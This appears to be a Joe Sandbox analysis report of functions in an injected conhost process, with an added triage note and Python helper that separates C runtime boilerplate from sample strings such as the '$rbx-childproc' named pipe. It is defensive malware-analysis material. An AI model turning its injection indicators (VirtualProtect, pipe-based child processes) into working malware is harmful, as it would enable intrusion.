                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID:
                                            • API String ID: 517849248-0
                                            • Opcode ID: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction ID: dcb824a40935339dac856b7cec85bb309ea266492ac2b7a6eac888e15fbcb4ce
                                            • Opcode Fuzzy Hash: 3678c02db6aac465212181e8004412cbf2c2ed21259821feedd311f468bba618
                                            • Instruction Fuzzy Hash: E6013922711E9083FB98DB12B85835A63A1F789FC0F4842379E4943755DE38C589C741
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                            • String ID:
                                            • API String ID: 449555515-0
                                            • Opcode ID: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction ID: 2959b77e3c3cdd99586a9154ce7ffeb22e4ca944c50c7c89cf8796626b504bf3
                                            • Opcode Fuzzy Hash: cded63a883f53769b64ee8603978d746ac0fde6b870154241cf5f6bb9e490f61
                                            • Instruction Fuzzy Hash: 0D010966712F5083FBAC9B22F84C71772A0AB46B45F14022BDA4907366EF3DC04CC742
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: FinalHandleNamePathlstrlen
                                            • String ID: \\?\
                                            • API String ID: 2719912262-4282027825
                                            • Opcode ID: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction ID: 445f7383d2b4b0a8255a2eec05a34b68bf5972eb02ab610cb265dfd4e4cb456e
                                            • Opcode Fuzzy Hash: effff3530f1f25e22f57eaf43e9f5b9d86630ec4a353fbe38ed28e1154ec946c
                                            • Instruction Fuzzy Hash: 34F0A423314E9593FB68DB20F48835B7360F749B88F844123CA4943555DF6CC68CC701
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: AddressFreeHandleLibraryModuleProc
                                            • String ID: CorExitProcess$mscoree.dll
                                            • API String ID: 4061214504-1276376045
                                            • Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction ID: f24e64302c5775dbc59dcc35033a4fb88b08f9ce441c419356bfdfe7cb287cae
                                            • Opcode Fuzzy Hash: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
                                            • Instruction Fuzzy Hash: 6FF01263311E1182EB5CCB24B89935B6364AB86761F54071BDA69465E6DF28C44CC602
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: CombinePath
                                            • String ID: \\.\pipe\
                                            • API String ID: 3422762182-91387939
                                            • Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction ID: 69e44681c45a294e89067f2f41181c451235d7af0cca2bb84670f1c25f1c68af
                                            • Opcode Fuzzy Hash: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
                                            • Instruction Fuzzy Hash: C4F05456314FA083FB8C8B12B91821B6251AB49FC1F444233ED4A07726CE28C4498701
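Triage note on the entries above: the functions tagged with `__scrt_*` names, the `api-ms-` string (the C runtime's API-set forwarder probe around LoadLibraryExW/GetProcAddress), `CONOUT$` (C runtime console error output) and `CorExitProcess$mscoree.dll` (the C runtime's exit handoff to the CLR) are MSVC runtime boilerplate present in any CRT-linked binary. The entries worth a closer look are the ones carrying this sample's own strings: `\\.\pipe\$rbx-childproc` (with CreateFile/ReadFile/WriteFile/CreateProcess), `$rbx-` (heap allocation) and the `\\.\pipe\` path combination. The following Python is an added triage helper, not part of the Joe Sandbox report or of the sample: it parses entries in the report's own `API ID` / `String ID` / `Opcode ID` format and separates CRT boilerplate from sample-specific strings. The marker lists are a heuristic of mine, the `rbx-` marker is chosen from this sample's strings by assumption, and because Joe Sandbox joins several strings with `$` the code matches substrings rather than assuming where one string ends and the next begins.

```python
"""Triage helper for Joe Sandbox function-listing entries (added example)."""
from collections import Counter
from dataclasses import dataclass

# Constructed input: the "API ID / String ID / Opcode ID" lines of eight
# entries from this report, copied as they appear. Joe Sandbox joins names
# and strings with '$'; the classifier matches substrings, so it does not
# assume where one joined string ends and the next begins.
SAMPLE = r"""
• API ID: File$Process$CloseCreateCurrentHandleReadThreadWrite
• String ID: \\.\pipe\$rbx-childproc
• Opcode ID: 2f0528e3c87d94e1cfa1c202f0bfd1f6cfafc65532576ba32c2772f85af7f427
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• Opcode ID: 53754b190eade9ddf9a12de580ea1969ce11fb76c0c5d26610c7ca44f503f6dd
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• Opcode ID: 71d948750e90526cf3ff779f44d5551170106daf63fa61af0dbf03442d3e65c3
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• Opcode ID: 42a144b3d0c2ce880bdd00bf22acff5208f3dd7a422955a941dc6bc7111c5e61
• API ID: Heap$Process$AllocFree
• String ID: $rbx-
• Opcode ID: cf694f0bea780c6e1211edc3f081aa45b4316966585fdcbda0fb213a5a03d4f8
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• Opcode ID: 339ee8a94e4e2630b1e7bbe0a7ae05b9533d7e89fe24ac804ce0b6f6a1d1c85e
• API ID: CombinePath
• String ID: \\.\pipe\
• Opcode ID: e16f4b25d0074ed40968d37b24dcd1bf4c0770f318e82e0156fcd8cc7ff66dcb
"""

# Heuristic markers (my choice, not from the report). The CRT group names
# MSVC runtime internals found in every CRT-linked binary: __scrt_* startup
# and teardown, the "api-ms-" API-set probe, CONOUT$ console error output and
# the CorExitProcess/mscoree.dll handoff to the CLR at exit.
CRT_API_MARKERS = ("__scrt_",)
CRT_STRING_MARKERS = ("api-ms-", "CONOUT$", "CorExitProcess$mscoree.dll")
# Assumption: "rbx-" is taken from this sample's own strings and file name.
SAMPLE_STRING_MARKERS = ("rbx-",)
NAMED_PIPE_PREFIX = "\\\\.\\pipe\\"  # the literal text \\.\pipe\


@dataclass
class Entry:
    api_id: str = ""
    string_id: str = ""
    opcode_id: str = ""


def parse_entries(text: str) -> list[Entry]:
    """Group '• Key: value' lines into entries; each 'API ID' line starts a new one."""
    entries: list[Entry] = []
    for raw in text.splitlines():
        line = raw.strip().lstrip("•").strip()
        if not line:
            continue
        key, sep, value = line.partition(":")
        if not sep:
            continue
        key, value = key.strip(), value.strip()
        if key == "API ID":
            entries.append(Entry(api_id=value))
        elif entries and key == "String ID":
            entries[-1].string_id = value
        elif entries and key == "Opcode ID":
            entries[-1].opcode_id = value
    return entries


def classify(entry: Entry) -> str:
    """Sample strings win over CRT markers, so a CRT-looking API set that
    handles a sample-specific string is still surfaced for review."""
    if any(m in entry.string_id for m in SAMPLE_STRING_MARKERS):
        return "sample-specific"
    if any(m in entry.api_id for m in CRT_API_MARKERS) or any(
        m in entry.string_id for m in CRT_STRING_MARKERS
    ):
        return "crt-boilerplate"
    return "unclassified"


def triage(text: str) -> dict:
    """Summarise a listing: label counts, strings to review, pipe paths, duplicates."""
    entries = parse_entries(text)
    labels = [classify(e) for e in entries]
    opcode_counts = Counter(e.opcode_id for e in entries if e.opcode_id)
    return {
        "counts": dict(Counter(labels)),
        # IOC candidates: every non-empty string not attributed to the CRT.
        "review_strings": [
            e.string_id for e, lbl in zip(entries, labels)
            if lbl != "crt-boilerplate" and e.string_id
        ],
        # Named-pipe paths regardless of label: IPC endpoints feed host
        # detections such as Sysmon pipe-created/pipe-connected events (ID 17/18).
        "pipe_strings": [e.string_id for e in entries if NAMED_PIPE_PREFIX in e.string_id],
        # The same Opcode ID in two memory dumps is one function seen twice,
        # not two distinct functions.
        "duplicate_opcodes": sorted(o for o, n in opcode_counts.items() if n > 1),
    }


if __name__ == "__main__":
    for key, value in triage(SAMPLE).items():
        print(f"{key}: {value}")
```

On the constructed input the helper leaves three strings for review (the two `rbx-` strings and the bare `\\.\pipe\` prefix), attributes five entries to the CRT, and reports the one Opcode ID that the report lists twice because the same function appears in two conhost memory snapshots.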
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmp
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                            • Instruction ID: 5b3f05bcbc5d8f3b32beda00b7088fa40b5690ad4ae9f3f87b7b9c91e83a4792
                                            • Opcode Fuzzy Hash: d921e495b5ff86d0954fcd723af1d701a904b7c821d12a86b124da1c2f3dacd7
                                            • Instruction Fuzzy Hash: 7102A733319B9486EBA48B55F49435BBBA0F385794F104127EA8E87BA9DF7CC458CB01
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction ID: 4153f7a27b4c78ccb8ebecf1bd9c05e6efd8b34a74f871116b4908281b273167
                                            • Opcode Fuzzy Hash: 7032d40e9fdebae4d03ce316ca6788aa89ff4a06af46faea50622b7dc22550b0
                                            • Instruction Fuzzy Hash: CE51B233304A6187EBA8DB16F448A5BB7A0F786B44F21821B9E5A43756DF38C849C751
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Value
                                            • String ID:
                                            • API String ID: 3702945584-0
                                            • Opcode ID: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction ID: dd2aa094d8c2cd07aa85d0bda7a8fd2117c572e17e347d652eaee2515588d969
                                            • Opcode Fuzzy Hash: 5c9254f6834b222fd2a91192d3bbd05b6f5f053a4dd622be8c2296fd59765fda
                                            • Instruction Fuzzy Hash: E9515037314A6187EBA8DF16F44861BB7A0F78AB84F51821BDE4A43756DF38D8098B41
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction ID: 615aae7d3f6d99732f8decee43a8598ff6c027492f0da07277f1c3f05233b384
                                            • Opcode Fuzzy Hash: f9fafa43fcee67a3a7710958ae0696c6d862f57b4097daa19824d4405277cc21
                                            • Instruction Fuzzy Hash: EA619676329A54C7E7A48B15F45831BB7A0F389784F101227FA8E47BA9DF7CC5488B42
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction ID: 115325d4e53982b7f827ee9d917fc1e7bf48b5cd172efcd13e3098bcd0bcc4fa
                                            • Opcode Fuzzy Hash: 8f39ec8e8825e7e8b48ed506b15ed582bafad4aa87a5a48c909f13f5417d00ae
                                            • Instruction Fuzzy Hash: FF110726705B9093EBA88B21F40821BB7B0FB46B84F040227EA4D077A5EF6DD958C785
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                            • String ID: csm
                                            • API String ID: 2395640692-1018135373
                                            • Opcode ID: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction ID: 2eb05f03c259af8622f592e53d25737ce577f94d4c4bb64b8be16e1c7e056564
                                            • Opcode Fuzzy Hash: b80ff68eb806cf2b6af9fc4dc9cc0d46113cdbfcc8a0c2797bbdc03f84945619
                                            • Instruction Fuzzy Hash: 0F51A433311E208BEB98CB15F44876F7795EB5AB98F144213EA4A4778ADFB8C849C711
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000003.2867908713.000002A5AF330000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002A5AF330000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_3_2a5af330000_conhost.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: 0a7731774aae4b735481d6dca671accfd74297adf9cdf2ab9b2016a18bc96007
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: 3A51A03B300A91CBEB78CF19A54835A77A1F356B99F144317DA9A47B96CF38C458C702
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                            • String ID: csm$csm
                                            • API String ID: 3896166516-3733052814
                                            • Opcode ID: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction ID: 7d55edc30564eb19836d5810678b9cdc88fc639b1fbd3246ca58bee467659de2
                                            • Opcode Fuzzy Hash: eaa3ef4f1944c03eb6c37dfa640564b8b9e6afec5d94ced6829f034688bc3bbb
                                            • Instruction Fuzzy Hash: F0515E33300A908BEFB88F21A54835B7BE5F356B94F144217DA9987B96CF38D458DB02
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: CallEncodePointerTranslator
                                            • String ID: MOC$RCC
                                            • API String ID: 3544855599-2084237596
                                            • Opcode ID: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction ID: ee618fd70a71a7276b51e5a4eef5b8d60680ef9aff20c90fb8ed5d7c5e1dd0b8
                                            • Opcode Fuzzy Hash: 17958f67cb0a17abd9ffe4ca5dea2288dd301e2c3aed8a7adc88a0e8f0f7cfb5
                                            • Instruction Fuzzy Hash: DA618B33704BC482EBA88F15F44439BBBA0F786B94F144217EA8953B96DF38C098CB01
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                            • String ID: pid_
                                            • API String ID: 517849248-4147670505
                                            • Opcode ID: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction ID: 214f91a4f3ded26d4e3433eaff72f64e6d800ffd471968e3902c4658960237d1
                                            • Opcode Fuzzy Hash: 351c56d785df20298bfbc2128b4df5e5f7d51d179e69475368e405930b6507af
                                            • Instruction Fuzzy Hash: A5117F13310FA193FB989B25F80839B62A4F75A784F9442679E8983796EF68C90DC701
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: FileWrite$ConsoleErrorLastOutput
                                            • String ID:
                                            • API String ID: 2718003287-0
                                            • Opcode ID: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction ID: 52911a3a8d5b5ee48a87a1b78c4c6386f65aab5c6f3d5bcbf83e3c48883794f1
                                            • Opcode Fuzzy Hash: 6e2b0015a5e192ecbb3898a491d5c4d6065fa3f656e88a841fb9fa74fea56143
                                            • Instruction Fuzzy Hash: 32D1EE33714AA08AE754CFA6E4482DE37B1F346B98F408217DE4DA7B9ADE34C00AC741
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3439296120.000002A5AF380000.00000004.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440055950.000002A5AF382000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3440687486.000002A5AF389000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_18_2_2a5af360000_conhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Free
                                            • String ID:
                                            • API String ID: 3168794593-0
                                            • Opcode ID: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction ID: ab0fcc66d7d40f7514759323c1552dd0bf716da8e4a32a793299546413c229a3
                                            • Opcode Fuzzy Hash: cb2f76e5a78e817a83185cac88bc62ecdb24cbc77a47800d9d0442b9e443284d
                                            • Instruction Fuzzy Hash: 5C015732711EA0DAEB58EF66A80814A77A0F78AF81B094127DB4A43B29DF38D055C740
                                            APIs
                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000,00000000,000002A5AF3728DF), ref: 000002A5AF372A12
                                            Memory Dump Source
                                            • Source File: 00000012.00000002.3437675185.000002A5AF361000.00000020.00001000.00020000.00000000.sdmp, Offset: 000002A5AF360000, based on PE: true
                                            • Associated: 00000012.00000002.3436966290.000002A5AF360000.00000002.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000012.00000002.3438501709.000002A5AF375000.00000002.00001000.00020000.00000000.sdmpDownload File
